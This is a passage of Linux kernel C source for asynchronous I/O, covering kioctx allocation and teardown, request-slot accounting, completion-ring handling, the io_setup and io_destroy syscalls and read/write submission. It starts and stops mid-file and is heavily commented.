	 * for counting against the global limit -- before it changes.
	 */
	unsigned int max_reqs = nr_events;

	/*
	 * We keep track of the number of available ringbuffer slots, to prevent
	 * overflow (reqs_available), and we also use percpu counters for this.
	 *
	 * So since up to half the slots might be on other cpu's percpu counters
	 * and unavailable, double nr_events so userspace sees what they
	 * expected: additionally, we move req_batch slots to/from percpu
	 * counters at a time, so make sure that isn't 0:
	 */
	nr_events = max(nr_events, num_possible_cpus() * 4);
	nr_events *= 2;

	/* Prevent overflows */
	if (nr_events > (0x10000000U / sizeof(struct io_event))) {
		pr_debug("ENOMEM: nr_events too high\n");
		return ERR_PTR(-EINVAL);
	}

	/* Reject a doubled-to-zero event count or a request for more than
	 * the sysctl-configurable global limit. */
	if (!nr_events || (unsigned long)max_reqs > aio_max_nr)
		return ERR_PTR(-EAGAIN);

	ctx = kmem_cache_zalloc(kioctx_cachep, GFP_KERNEL);
	if (!ctx)
		return ERR_PTR(-ENOMEM);

	ctx->max_reqs = max_reqs;

	spin_lock_init(&ctx->ctx_lock);
	spin_lock_init(&ctx->completion_lock);
	mutex_init(&ctx->ring_lock);
	/* Protect against page migration throughout kiotx setup by keeping
	 * the ring_lock mutex held until setup is complete. */
	mutex_lock(&ctx->ring_lock);
	init_waitqueue_head(&ctx->wait);

	INIT_LIST_HEAD(&ctx->active_reqs);

	if (percpu_ref_init(&ctx->users, free_ioctx_users, 0, GFP_KERNEL))
		goto err;

	if (percpu_ref_init(&ctx->reqs, free_ioctx_reqs, 0, GFP_KERNEL))
		goto err;

	ctx->cpu = alloc_percpu(struct kioctx_cpu);
	if (!ctx->cpu)
		goto err;

	err = aio_setup_ring(ctx, nr_events);
	if (err < 0)
		goto err;

	/* One event slot is reserved (ring head == tail means empty). */
	atomic_set(&ctx->reqs_available, ctx->nr_events - 1);
	ctx->req_batch = (ctx->nr_events - 1) / (num_possible_cpus() * 4);
	if (ctx->req_batch < 1)
		ctx->req_batch = 1;

	/* limit the number of system wide aios */
	spin_lock(&aio_nr_lock);
	if (aio_nr + ctx->max_reqs > aio_max_nr ||
	    aio_nr + ctx->max_reqs < aio_nr) {
		spin_unlock(&aio_nr_lock);
		err = -EAGAIN;
		goto err_ctx;
	}
	aio_nr += ctx->max_reqs;
	spin_unlock(&aio_nr_lock);

	percpu_ref_get(&ctx->users);	/* io_setup() will drop this ref */
	percpu_ref_get(&ctx->reqs);	/* free_ioctx_users() will drop this */

	err = ioctx_add_table(ctx, mm);
	if (err)
		goto err_cleanup;

	/* Release the ring_lock mutex now that all setup is complete. */
	mutex_unlock(&ctx->ring_lock);

	pr_debug("allocated ioctx %p[%ld]: mm=%p mask=0x%x\n",
		 ctx, ctx->user_id, mm, ctx->nr_events);
	return ctx;

err_cleanup:
	/* Undo the aio_nr accounting taken above. */
	aio_nr_sub(ctx->max_reqs);
err_ctx:
	/* Ring was set up: mark dead, unmap and free it. */
	atomic_set(&ctx->dead, 1);
	if (ctx->mmap_size)
		vm_munmap(ctx->mmap_base, ctx->mmap_size);
	aio_free_ring(ctx);
err:
	mutex_unlock(&ctx->ring_lock);
	free_percpu(ctx->cpu);
	percpu_ref_exit(&ctx->reqs);
	percpu_ref_exit(&ctx->users);
	kmem_cache_free(kioctx_cachep, ctx);
	pr_debug("error allocating ioctx %d\n", err);
	return ERR_PTR(err);
}
/* kill_ioctx
 *	Cancels all outstanding aio requests on an aio context.  Used
 *	when the processes owning a context have all exited to encourage
 *	the rapid destruction of the kioctx.
 */
static int kill_ioctx(struct mm_struct *mm, struct kioctx *ctx,
		      struct ctx_rq_wait *wait)
{
	struct kioctx_table *table;

	spin_lock(&mm->ioctx_lock);
	/* atomic_xchg makes concurrent killers race safely: only the first
	 * caller to flip ->dead proceeds with teardown. */
	if (atomic_xchg(&ctx->dead, 1)) {
		spin_unlock(&mm->ioctx_lock);
		return -EINVAL;
	}

	/* Unpublish the ctx so lookup_ioctx() can no longer find it. */
	table = rcu_dereference_raw(mm->ioctx_table);
	WARN_ON(ctx != rcu_access_pointer(table->table[ctx->id]));
	RCU_INIT_POINTER(table->table[ctx->id], NULL);
	spin_unlock(&mm->ioctx_lock);

	/* free_ioctx_reqs() will do the necessary RCU synchronization */
	wake_up_all(&ctx->wait);

	/*
	 * It'd be more correct to do this in free_ioctx(), after all
	 * the outstanding kiocbs have finished - but by then io_destroy
	 * has already returned, so io_setup() could potentially return
	 * -EAGAIN with no ioctxs actually in use (as far as userspace
	 * could tell).
	 */
	aio_nr_sub(ctx->max_reqs);

	if (ctx->mmap_size)
		vm_munmap(ctx->mmap_base, ctx->mmap_size);

	/* Record the waiter (may be NULL) and kill ctx->users; the rest of
	 * teardown continues in free_ioctx_users()/free_ioctx_reqs(). */
	ctx->rq_wait = wait;
	percpu_ref_kill(&ctx->users);
	return 0;
}
/*
 * exit_aio: called when the last user of mm goes away.  At this point, there is
 * no way for any new requests to be submited or any of the io_* syscalls to be
 * called on the context.
 *
 * There may be outstanding kiocbs, but free_ioctx() will explicitly wait on
 * them.
 */
void exit_aio(struct mm_struct *mm)
{
	struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
	struct ctx_rq_wait wait;
	int i, skipped;

	if (!table)
		return;

	/* Assume every slot holds a ctx; empty slots are subtracted from
	 * the wait count below via 'skipped'. */
	atomic_set(&wait.count, table->nr);
	init_completion(&wait.comp);

	skipped = 0;
	for (i = 0; i < table->nr; ++i) {
		struct kioctx *ctx =
			rcu_dereference_protected(table->table[i], true);

		if (!ctx) {
			skipped++;
			continue;
		}

		/*
		 * We don't need to bother with munmap() here - exit_mmap(mm)
		 * is coming and it'll unmap everything. And we simply can't,
		 * this is not necessarily our ->mm.
		 * Since kill_ioctx() uses non-zero ->mmap_size as indicator
		 * that it needs to unmap the area, just set it to 0.
		 */
		ctx->mmap_size = 0;
		kill_ioctx(mm, ctx, &wait);
	}

	if (!atomic_sub_and_test(skipped, &wait.count)) {
		/* Wait until all IO for the context are done. */
		wait_for_completion(&wait.comp);
	}

	/* All ctxs are gone; drop the table itself. */
	RCU_INIT_POINTER(mm->ioctx_table, NULL);
	kfree(table);
}
/*
 * Return @nr request slots to this cpu's percpu pool.  When the local pool
 * exceeds two batches, spill whole batches back into the shared atomic
 * counter so other cpus can use them.  Runs with irqs disabled to keep the
 * percpu counter consistent against completion in irq context.
 */
static void put_reqs_available(struct kioctx *ctx, unsigned nr)
{
	struct kioctx_cpu *kcpu;
	unsigned long flags;

	local_irq_save(flags);
	kcpu = this_cpu_ptr(ctx->cpu);
	kcpu->reqs_available += nr;

	while (kcpu->reqs_available >= ctx->req_batch * 2) {
		kcpu->reqs_available -= ctx->req_batch;
		atomic_add(ctx->req_batch, &ctx->reqs_available);
	}

	local_irq_restore(flags);
}
/*
 * Try to take one request slot from this cpu's percpu pool, refilling the
 * pool by one batch from the shared atomic counter if it is empty.
 * Returns true if a slot was obtained, false if the ring is out of slots.
 */
static bool __get_reqs_available(struct kioctx *ctx)
{
	struct kioctx_cpu *kcpu;
	bool ret = false;
	unsigned long flags;

	local_irq_save(flags);
	kcpu = this_cpu_ptr(ctx->cpu);
	if (!kcpu->reqs_available) {
		int avail = atomic_read(&ctx->reqs_available);

		/* cmpxchg loop: claim a whole batch from the shared counter;
		 * bail if fewer than a batch remain. */
		do {
			if (avail < ctx->req_batch)
				goto out;
		} while (!atomic_try_cmpxchg(&ctx->reqs_available,
					     &avail, avail - ctx->req_batch));

		kcpu->reqs_available += ctx->req_batch;
	}

	ret = true;
	kcpu->reqs_available--;
out:
	local_irq_restore(flags);
	return ret;
}
/* refill_reqs_available
 *	Updates the reqs_available reference counts used for tracking the
 *	number of free slots in the completion ring.  This can be called
 *	from aio_complete() (to optimistically update reqs_available) or
 *	from aio_get_req() (the we're out of events case).  It must be
 *	called holding ctx->completion_lock.
 */
static void refill_reqs_available(struct kioctx *ctx, unsigned head,
				  unsigned tail)
{
	unsigned events_in_ring, completed;

	/* Clamp head since userland can write to it. */
	head %= ctx->nr_events;
	if (head <= tail)
		events_in_ring = tail - head;
	else
		events_in_ring = ctx->nr_events - (head - tail);

	/* Only slots whose events have been consumed by userspace (i.e. no
	 * longer sitting in the ring) can be handed back. */
	completed = ctx->completed_events;
	if (events_in_ring < completed)
		completed -= events_in_ring;
	else
		completed = 0;

	if (!completed)
		return;

	ctx->completed_events -= completed;
	put_reqs_available(ctx, completed);
}
/* user_refill_reqs_available
 *	Called to refill reqs_available when aio_get_req() encounters an
 *	out of space in the completion ring.
 */
static void user_refill_reqs_available(struct kioctx *ctx)
{
	spin_lock_irq(&ctx->completion_lock);
	if (ctx->completed_events) {
		struct aio_ring *ring;
		unsigned head;

		/* Access of ring->head may race with aio_read_events_ring()
		 * here, but that's okay since whether we read the old version
		 * or the new version, and either will be valid.  The important
		 * part is that head cannot pass tail since we prevent
		 * aio_complete() from updating tail by holding
		 * ctx->completion_lock.  Even if head is invalid, the check
		 * against ctx->completed_events below will make sure we do the
		 * safe/right thing.
		 */
		ring = folio_address(ctx->ring_folios[0]);
		head = ring->head;

		refill_reqs_available(ctx, head, ctx->tail);
	}

	spin_unlock_irq(&ctx->completion_lock);
}
/*
 * Grab one request slot, retrying once after reclaiming any slots whose
 * events userspace has already consumed from the ring.
 */
static bool get_reqs_available(struct kioctx *ctx)
{
	bool ok = __get_reqs_available(ctx);

	if (!ok) {
		user_refill_reqs_available(ctx);
		ok = __get_reqs_available(ctx);
	}
	return ok;
}
/* aio_get_req
 *	Allocate a slot for an aio request.
 * Returns NULL if no requests are free.
 *
 * The refcount is initialized to 2 - one for the async op completion,
 * one for the synchronous code that does this.
 */
static inline struct aio_kiocb *aio_get_req(struct kioctx *ctx)
{
	struct aio_kiocb *req;

	req = kmem_cache_alloc(kiocb_cachep, GFP_KERNEL);
	if (unlikely(!req))
		return NULL;

	/* No free slot in the completion ring: undo the allocation. */
	if (unlikely(!get_reqs_available(ctx))) {
		kmem_cache_free(kiocb_cachep, req);
		return NULL;
	}

	/* Pin the ctx for the lifetime of this request; dropped by
	 * iocb_destroy(). */
	percpu_ref_get(&ctx->reqs);
	req->ki_ctx = ctx;
	INIT_LIST_HEAD(&req->ki_list);
	refcount_set(&req->ki_refcnt, 2);
	req->ki_eventfd = NULL;
	return req;
}
/*
 * Resolve a userspace aio_context_t (which is the ring's mapped address)
 * to its kioctx, taking a live reference on ctx->users.  Returns NULL if
 * the id is stale, the ctx is dying, or the copy from userspace faults.
 */
static struct kioctx *lookup_ioctx(unsigned long ctx_id)
{
	struct aio_ring __user *ring  = (void __user *)ctx_id;
	struct mm_struct *mm = current->mm;
	struct kioctx *ctx, *ret = NULL;
	struct kioctx_table *table;
	unsigned id;

	/* The table index lives in the user-mapped ring header. */
	if (get_user(id, &ring->id))
		return NULL;

	rcu_read_lock();
	table = rcu_dereference(mm->ioctx_table);

	if (!table || id >= table->nr)
		goto out;

	/* id came from userspace: clamp it against speculative execution. */
	id = array_index_nospec(id, table->nr);
	ctx = rcu_dereference(table->table[id]);
	/* Double-check user_id so a recycled slot can't match a stale id. */
	if (ctx && ctx->user_id == ctx_id) {
		if (percpu_ref_tryget_live(&ctx->users))
			ret = ctx;
	}
out:
	rcu_read_unlock();
	return ret;
}
/*
 * Final teardown of an aio_kiocb once its refcount has hit zero:
 * release the optional eventfd, the target file, the per-request ctx
 * reference, and the iocb itself.
 */
static inline void iocb_destroy(struct aio_kiocb *iocb)
{
	if (iocb->ki_eventfd)
		eventfd_ctx_put(iocb->ki_eventfd);
	if (iocb->ki_filp)
		fput(iocb->ki_filp);
	percpu_ref_put(&iocb->ki_ctx->reqs);
	kmem_cache_free(kiocb_cachep, iocb);
}
/*
 * Per-waiter entry parked on ctx->wait by read_events(); min_nr is the
 * number of available events needed before aio_complete() wakes it.
 */
struct aio_waiter {
	struct wait_queue_entry	w;
	size_t			min_nr;
};
/* aio_complete
 *	Called when the io request on the given iocb is complete.
 */
static void aio_complete(struct aio_kiocb *iocb)
{
	struct kioctx	*ctx = iocb->ki_ctx;
	struct aio_ring	*ring;
	struct io_event	*ev_page, *event;
	unsigned tail, pos, head, avail;
	unsigned long	flags;

	/*
	 * Add a completion event to the ring buffer. Must be done holding
	 * ctx->completion_lock to prevent other code from messing with the tail
	 * pointer since we might be called from irq context.
	 */
	spin_lock_irqsave(&ctx->completion_lock, flags);

	tail = ctx->tail;
	pos = tail + AIO_EVENTS_OFFSET;

	if (++tail >= ctx->nr_events)
		tail = 0;

	/* Locate the io_event slot inside the ring's folio array. */
	ev_page = folio_address(ctx->ring_folios[pos / AIO_EVENTS_PER_PAGE]);
	event = ev_page + pos % AIO_EVENTS_PER_PAGE;

	*event = iocb->ki_res;

	flush_dcache_folio(ctx->ring_folios[pos / AIO_EVENTS_PER_PAGE]);

	pr_debug("%p[%u]: %p: %p %Lx %Lx %Lx\n", ctx, tail, iocb,
		 (void __user *)(unsigned long)iocb->ki_res.obj,
		 iocb->ki_res.data, iocb->ki_res.res, iocb->ki_res.res2);

	/* after flagging the request as done, we
	 * must never even look at it again
	 */
	smp_wmb(); /* make event visible before updating tail */

	ctx->tail = tail;

	ring = folio_address(ctx->ring_folios[0]);
	head = ring->head;
	ring->tail = tail;
	flush_dcache_folio(ctx->ring_folios[0]);

	/* First completion just counts; subsequent ones also try to hand
	 * consumed slots back via refill_reqs_available(). */
	ctx->completed_events++;
	if (ctx->completed_events > 1)
		refill_reqs_available(ctx, head, tail);

	/* Number of events now readable, used for min_nr wakeups below. */
	avail = tail > head
		? tail - head
		: tail + ctx->nr_events - head;
	spin_unlock_irqrestore(&ctx->completion_lock, flags);

	pr_debug("added to ring %p at [%u]\n", iocb, tail);

	/*
	 * Check if the user asked us to deliver the result through an
	 * eventfd. The eventfd_signal() function is safe to be called
	 * from IRQ context.
	 */
	if (iocb->ki_eventfd)
		eventfd_signal(iocb->ki_eventfd);

	/*
	 * We have to order our ring_info tail store above and test
	 * of the wait list below outside the wait lock.  This is
	 * like in wake_up_bit() where clearing a bit has to be
	 * ordered with the unlocked test.
	 */
	smp_mb();

	if (waitqueue_active(&ctx->wait)) {
		struct aio_waiter *curr, *next;
		unsigned long flags;

		/* Wake only waiters whose min_nr threshold is satisfied. */
		spin_lock_irqsave(&ctx->wait.lock, flags);
		list_for_each_entry_safe(curr, next, &ctx->wait.head, w.entry)
			if (avail >= curr->min_nr) {
				wake_up_process(curr->w.private);
				list_del_init_careful(&curr->w.entry);
			}
		spin_unlock_irqrestore(&ctx->wait.lock, flags);
	}
}
/*
 * Drop one reference on the iocb; the final reference publishes the
 * completion event to the ring and frees the request.
 */
static inline void iocb_put(struct aio_kiocb *iocb)
{
	if (!refcount_dec_and_test(&iocb->ki_refcnt))
		return;

	aio_complete(iocb);
	iocb_destroy(iocb);
}
/* aio_read_events_ring
 *	Pull an event off of the ioctx's event ring.  Returns the number of
 *	events fetched
 */
static long aio_read_events_ring(struct kioctx *ctx,
				 struct io_event __user *event, long nr)
{
	struct aio_ring *ring;
	unsigned head, tail, pos;
	long ret = 0;
	int copy_ret;

	/*
	 * The mutex can block and wake us up and that will cause
	 * wait_event_interruptible_hrtimeout() to schedule without sleeping
	 * and repeat. This should be rare enough that it doesn't cause
	 * peformance issues. See the comment in read_events() for more detail.
	 */
	sched_annotate_sleep();
	mutex_lock(&ctx->ring_lock);

	/* Access to ->ring_folios here is protected by ctx->ring_lock. */
	ring = folio_address(ctx->ring_folios[0]);
	head = ring->head;
	tail = ring->tail;

	/*
	 * Ensure that once we've read the current tail pointer, that
	 * we also see the events that were stored up to the tail.
	 */
	smp_rmb();

	pr_debug("h%u t%u m%u\n", head, tail, ctx->nr_events);

	if (head == tail)
		goto out;

	/* head/tail come from the user-writable ring header; clamp them. */
	head %= ctx->nr_events;
	tail %= ctx->nr_events;

	while (ret < nr) {
		long avail;
		struct io_event *ev;
		struct folio *folio;

		/* Contiguous events up to tail or the end of the ring. */
		avail = (head <= tail ?  tail : ctx->nr_events) - head;
		if (head == tail)
			break;

		pos = head + AIO_EVENTS_OFFSET;
		folio = ctx->ring_folios[pos / AIO_EVENTS_PER_PAGE];
		pos %= AIO_EVENTS_PER_PAGE;

		/* Further limit to the caller's budget and the folio edge. */
		avail = min(avail, nr - ret);
		avail = min_t(long, avail, AIO_EVENTS_PER_PAGE - pos);

		ev = folio_address(folio);
		copy_ret = copy_to_user(event + ret, ev + pos,
					sizeof(*ev) * avail);

		if (unlikely(copy_ret)) {
			ret = -EFAULT;
			goto out;
		}

		ret += avail;
		head += avail;
		head %= ctx->nr_events;
	}

	/* Publish the new head so aio_complete() can reuse the slots. */
	ring = folio_address(ctx->ring_folios[0]);
	ring->head = head;
	flush_dcache_folio(ctx->ring_folios[0]);

	pr_debug("%li  h%u t%u\n", ret, head, tail);
out:
	mutex_unlock(&ctx->ring_lock);

	return ret;
}
/*
 * Wrapper used as the wait condition by read_events(): fetch events into
 * *i (cumulative count) and report whether waiting should stop.  On error
 * (ring read failure or dead ctx) the error is passed out through *i when
 * no events were gathered; returns true when done (error or min_nr met).
 */
static bool aio_read_events(struct kioctx *ctx, long min_nr, long nr,
			    struct io_event __user *event, long *i)
{
	long ret = aio_read_events_ring(ctx, event + *i, nr - *i);

	if (ret > 0)
		*i += ret;

	if (unlikely(atomic_read(&ctx->dead)))
		ret = -EINVAL;

	/* No events gathered so far: surface ret (0 or an error) in *i. */
	if (!*i)
		*i = ret;

	return ret < 0 || *i >= min_nr;
}
/*
 * Core of io_getevents(): gather between min_nr and nr events, sleeping on
 * ctx->wait (with an optional hrtimer deadline 'until') until enough events
 * arrive, the timeout fires, or a signal is pending.  Returns the number of
 * events copied to userspace or a negative error.
 */
static long read_events(struct kioctx *ctx, long min_nr, long nr,
			struct io_event __user *event,
			ktime_t until)
{
	struct hrtimer_sleeper	t;
	struct aio_waiter	w;
	long ret = 0, ret2 = 0;

	/*
	 * Note that aio_read_events() is being called as the conditional - i.e.
	 * we're calling it after prepare_to_wait() has set task state to
	 * TASK_INTERRUPTIBLE.
	 *
	 * But aio_read_events() can block, and if it blocks it's going to flip
	 * the task state back to TASK_RUNNING.
	 *
	 * This should be ok, provided it doesn't flip the state back to
	 * TASK_RUNNING and return 0 too much - that causes us to spin. That
	 * will only happen if the mutex_lock() call blocks, and we then find
	 * the ringbuffer empty. So in practice we should be ok, but it's
	 * something to be aware of when touching this code.
	 */
	aio_read_events(ctx, min_nr, nr, event, &ret);
	/* Fast path: non-blocking call, error, or already enough events. */
	if (until == 0 || ret < 0 || ret >= min_nr)
		return ret;

	hrtimer_setup_sleeper_on_stack(&t, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
	if (until != KTIME_MAX) {
		hrtimer_set_expires_range_ns(&t.timer, until, current->timer_slack_ns);
		hrtimer_sleeper_start_expires(&t, HRTIMER_MODE_REL);
	}

	init_wait(&w.w);

	while (1) {
		unsigned long nr_got = ret;

		/* Tell aio_complete() how many more events we still need
		 * before a wakeup is worthwhile. */
		w.min_nr = min_nr - ret;

		/* ret2 != 0 means a signal is pending. */
		ret2 = prepare_to_wait_event(&ctx->wait, &w.w, TASK_INTERRUPTIBLE);
		/* t.task cleared means the hrtimer deadline has fired. */
		if (!ret2 && !t.task)
			ret2 = -ETIME;

		if (aio_read_events(ctx, min_nr, nr, event, &ret) || ret2)
			break;

		/* Only sleep if this pass produced no new events. */
		if (nr_got == ret)
			schedule();
	}

	finish_wait(&ctx->wait, &w.w);
	hrtimer_cancel(&t.timer);
	destroy_hrtimer_on_stack(&t.timer);

	return ret;
}
/* sys_io_setup:
 *	Create an aio_context capable of receiving at least nr_events.
 *	ctxp must not point to an aio_context that already exists, and
 *	must be initialized to 0 prior to the call.  On successful
 *	creation of the aio_context, *ctxp is filled in with the resulting
 *	handle.  May fail with -EINVAL if *ctxp is not initialized,
 *	if the specified nr_events exceeds internal limits.  May fail
 *	with -EAGAIN if the specified nr_events exceeds the user's limit
 *	of available events.  May fail with -ENOMEM if insufficient kernel
 *	resources are available.  May fail with -EFAULT if an invalid
 *	pointer is passed for ctxp.  Will fail with -ENOSYS if not
 *	implemented.
 */
SYSCALL_DEFINE2(io_setup, unsigned, nr_events, aio_context_t __user *, ctxp)
{
	struct kioctx *ioctx = NULL;
	unsigned long ctx;
	long ret;

	ret = get_user(ctx, ctxp);
	if (unlikely(ret))
		goto out;

	/* The ABI requires *ctxp to be zeroed by the caller. */
	ret = -EINVAL;
	if (unlikely(ctx || nr_events == 0)) {
		pr_debug("EINVAL: ctx %lu nr_events %u\n",
		         ctx, nr_events);
		goto out;
	}

	ioctx = ioctx_alloc(nr_events);
	ret = PTR_ERR(ioctx);
	if (!IS_ERR(ioctx)) {
		ret = put_user(ioctx->user_id, ctxp);
		/* Couldn't hand the id to userspace: tear the ctx down. */
		if (ret)
			kill_ioctx(current->mm, ioctx, NULL);
		/* Drop the reference ioctx_alloc() took for us. */
		percpu_ref_put(&ioctx->users);
	}

out:
	return ret;
}
#ifdef CONFIG_COMPAT
/*
 * 32-bit compat variant of io_setup(): identical to the native syscall
 * except that the context handle is written back as a u32.
 */
COMPAT_SYSCALL_DEFINE2(io_setup, unsigned, nr_events, u32 __user *, ctx32p)
{
	struct kioctx *ioctx = NULL;
	unsigned long ctx;
	long ret;

	ret = get_user(ctx, ctx32p);
	if (unlikely(ret))
		goto out;

	/* The ABI requires *ctx32p to be zeroed by the caller. */
	ret = -EINVAL;
	if (unlikely(ctx || nr_events == 0)) {
		pr_debug("EINVAL: ctx %lu nr_events %u\n",
		         ctx, nr_events);
		goto out;
	}

	ioctx = ioctx_alloc(nr_events);
	ret = PTR_ERR(ioctx);
	if (!IS_ERR(ioctx)) {
		/* truncating is ok because it's a user address */
		ret = put_user((u32)ioctx->user_id, ctx32p);
		if (ret)
			kill_ioctx(current->mm, ioctx, NULL);
		/* Drop the reference ioctx_alloc() took for us. */
		percpu_ref_put(&ioctx->users);
	}

out:
	return ret;
}
#endif
/* sys_io_destroy:
 *	Destroy the aio_context specified.  May cancel any outstanding
 *	AIOs and block on completion.  Will fail with -ENOSYS if not
 *	implemented.  May fail with -EINVAL if the context pointed to
 *	is invalid.
 */
SYSCALL_DEFINE1(io_destroy, aio_context_t, ctx)
{
	struct kioctx *ioctx = lookup_ioctx(ctx);
	if (likely(NULL != ioctx)) {
		struct ctx_rq_wait wait;
		int ret;

		init_completion(&wait.comp);
		atomic_set(&wait.count, 1);

		/* Pass requests_done to kill_ioctx() where it can be set
		 * in a thread-safe way. If we try to set it here then we have
		 * a race condition if two io_destroy() called simultaneously.
		 */
		ret = kill_ioctx(current->mm, ioctx, &wait);
		/* Drop the reference taken by lookup_ioctx(). */
		percpu_ref_put(&ioctx->users);

		/* Wait until all IO for the context are done. Otherwise kernel
		 * keep using user-space buffers even if user thinks the context
		 * is destroyed.
		 */
		if (!ret)
			wait_for_completion(&wait.comp);

		return ret;
	}
	pr_debug("EINVAL: invalid context id\n");
	return -EINVAL;
}
/*
 * Remove a completed iocb from its ctx's active_reqs (cancellation) list,
 * under ctx_lock since cancellation paths walk that list concurrently.
 */
static void aio_remove_iocb(struct aio_kiocb *iocb)
{
	struct kioctx *ctx = iocb->ki_ctx;
	unsigned long flags;

	spin_lock_irqsave(&ctx->ctx_lock, flags);
	list_del(&iocb->ki_list);
	spin_unlock_irqrestore(&ctx->ctx_lock, flags);
}
/*
 * ->ki_complete callback for aio read/write requests: detach from the
 * cancellation list if needed, end write-protection on regular files,
 * record the result and drop the completion-side reference.
 */
static void aio_complete_rw(struct kiocb *kiocb, long res)
{
	struct aio_kiocb *iocb = container_of(kiocb, struct aio_kiocb, rw);

	/* list_empty_careful: the iocb may only be on active_reqs if a
	 * cancel function was registered via kiocb_set_cancel_fn(). */
	if (!list_empty_careful(&iocb->ki_list))
		aio_remove_iocb(iocb);

	if (kiocb->ki_flags & IOCB_WRITE) {
		struct inode *inode = file_inode(kiocb->ki_filp);

		/* Pairs with kiocb_start_write() done in aio_write(). */
		if (S_ISREG(inode->i_mode))
			kiocb_end_write(kiocb);
	}

	iocb->ki_res.res = res;
	iocb->ki_res.res2 = 0;
	iocb_put(iocb);
}
/*
 * Initialize the embedded kiocb for a read/write request from the
 * userspace iocb: position, flags, priority and RWF_* flags.
 * Returns 0 or a negative error (bad ioprio or rw flags).
 */
static int aio_prep_rw(struct kiocb *req, const struct iocb *iocb, int rw_type)
{
	int ret;

	req->ki_write_stream = 0;
	req->ki_complete = aio_complete_rw;
	req->private = NULL;
	req->ki_pos = iocb->aio_offset;
	/* IOCB_AIO_RW marks this kiocb as an aio request so
	 * kiocb_set_cancel_fn() can recognize it. */
	req->ki_flags = req->ki_filp->f_iocb_flags | IOCB_AIO_RW;
	if (iocb->aio_flags & IOCB_FLAG_RESFD)
		req->ki_flags |= IOCB_EVENTFD;
	if (iocb->aio_flags & IOCB_FLAG_IOPRIO) {
		/*
		 * If the IOCB_FLAG_IOPRIO flag of aio_flags is set, then
		 * aio_reqprio is interpreted as an I/O scheduling
		 * class and priority.
		 */
		ret = ioprio_check_cap(iocb->aio_reqprio);
		if (ret) {
			pr_debug("aio ioprio check cap error: %d\n", ret);
			return ret;
		}

		req->ki_ioprio = iocb->aio_reqprio;
	} else
		req->ki_ioprio = get_current_ioprio();

	ret = kiocb_set_rw_flags(req, iocb->aio_rw_flags, rw_type);
	if (unlikely(ret))
		return ret;

	req->ki_flags &= ~IOCB_HIPRI; /* no one is going to poll for this I/O */
	return 0;
}
/*
 * Build the iov_iter for a read/write request.  For vectored ops
 * (PREADV/PWRITEV) aio_buf points at an iovec array of aio_nbytes
 * entries; otherwise it is a plain user buffer of aio_nbytes bytes.
 * *iovec receives any heap-allocated iovec the caller must kfree().
 */
static ssize_t aio_setup_rw(int rw, const struct iocb *iocb,
			    struct iovec **iovec, bool vectored, bool compat,
			    struct iov_iter *iter)
{
	void __user *buf = (void __user *)(uintptr_t)iocb->aio_buf;
	size_t len = iocb->aio_nbytes;

	if (vectored)
		return __import_iovec(rw, buf, len, UIO_FASTIOV, iovec, iter,
				      compat);

	/* Single-buffer case never allocates an iovec. */
	*iovec = NULL;
	return import_ubuf(rw, buf, len, iter);
}
/*
 * Finish a read/write submission.  -EIOCBQUEUED means the op completes
 * asynchronously and ->ki_complete will run later; any restart error is
 * converted to -EINTR (the syscall cannot be restarted once other AIOs
 * may be in flight); everything else is completed inline.
 */
static inline void aio_rw_done(struct kiocb *req, ssize_t ret)
{
	if (ret == -EIOCBQUEUED)
		return;

	if (ret == -ERESTARTSYS || ret == -ERESTARTNOINTR ||
	    ret == -ERESTARTNOHAND || ret == -ERESTART_RESTARTBLOCK) {
		/*
		 * There's no easy way to restart the syscall since other AIO's
		 * may be already running. Just fail this IO with EINTR.
		 */
		ret = -EINTR;
	}

	req->ki_complete(req, ret);
}
/*
 * Submit an IOCB_CMD_PREAD/PREADV request.  Returns 0 on successful
 * submission (completion is delivered via aio_complete_rw) or a negative
 * error, in which case the caller completes the iocb.
 */
static int aio_read(struct kiocb *req, const struct iocb *iocb,
			bool vectored, bool compat)
{
	struct iovec inline_vecs[UIO_FASTIOV], *iovec = inline_vecs;
	struct iov_iter iter;
	struct file *file;
	int ret;

	ret = aio_prep_rw(req, iocb, READ);
	if (ret)
		return ret;
	file = req->ki_filp;
	if (unlikely(!(file->f_mode & FMODE_READ)))
		return -EBADF;
	if (unlikely(!file->f_op->read_iter))
		return -EINVAL;

	ret = aio_setup_rw(ITER_DEST, iocb, &iovec, vectored, compat, &iter);
	if (ret < 0)
		return ret;
	ret = rw_verify_area(READ, file, &req->ki_pos, iov_iter_count(&iter));
	if (!ret)
		aio_rw_done(req, file->f_op->read_iter(req, &iter));
	/* kfree(NULL) is a no-op for the non-vectored/inline-vec case. */
	kfree(iovec);
	return ret;
}
/*
 * Submit an IOCB_CMD_PWRITE/PWRITEV request.  Mirror of aio_read() with
 * write-side checks plus kiocb_start_write() on regular files (ended by
 * aio_complete_rw()).
 */
static int aio_write(struct kiocb *req, const struct iocb *iocb,
			 bool vectored, bool compat)
{
	struct iovec inline_vecs[UIO_FASTIOV], *iovec = inline_vecs;
	struct iov_iter iter;
	struct file *file;
	int ret;

	ret = aio_prep_rw(req, iocb, WRITE);
	if (ret)
		return ret;
	file = req->ki_filp;

	if (unlikely(!(file->f_mode & FMODE_WRITE)))
		return -EBADF;
	if (unlikely(!file->f_op->write_iter))
		return -EINVAL;

	ret = aio_setup_rw(ITER_SOURCE, iocb, &iovec, vectored, compat, &iter);
	if (ret < 0)
		return ret;
	ret = rw_verify_area(WRITE, file, &req->ki_pos, iov_iter_count(&iter));
	if (!ret) {
		/* Take write protection on regular files; released in
		 * aio_complete_rw() via kiocb_end_write(). */
		if (S_ISREG(file_inode(file)->i_mode))
			kiocb_start_write(req);
		req->ki_flags |= IOCB_WRITE;
		aio_rw_done(req, file->f_op->write_iter(req, &iter));
	}
	/* kfree(NULL) is a no-op for the non-vectored/inline-vec case. */
	kfree(iovec);
	return ret;
}
/*
 * Workqueue function for IOCB_CMD_FSYNC/FDSYNC: run vfs_fsync() with the
 * credentials of the submitting task, then complete the iocb.
 */
static void aio_fsync_work(struct work_struct *work)
{
	struct aio_kiocb *iocb = container_of(work, struct aio_kiocb, fsync.work);

	/* Temporarily adopt the submitter's creds for the fsync call. */
	scoped_with_creds(iocb->fsync.creds)
		iocb->ki_res.res = vfs_fsync(iocb->fsync.file, iocb->fsync.datasync);
	put_cred(iocb->fsync.creds);
	iocb_put(iocb);
}
/*
 * Submit an fsync/fdatasync request; the actual sync runs from a
 * workqueue (aio_fsync_work) since vfs_fsync() may block.
 * Returns 0 on successful submission or a negative error.
 */
static int aio_fsync(struct fsync_iocb *req, const struct iocb *iocb,
		     bool datasync)
{
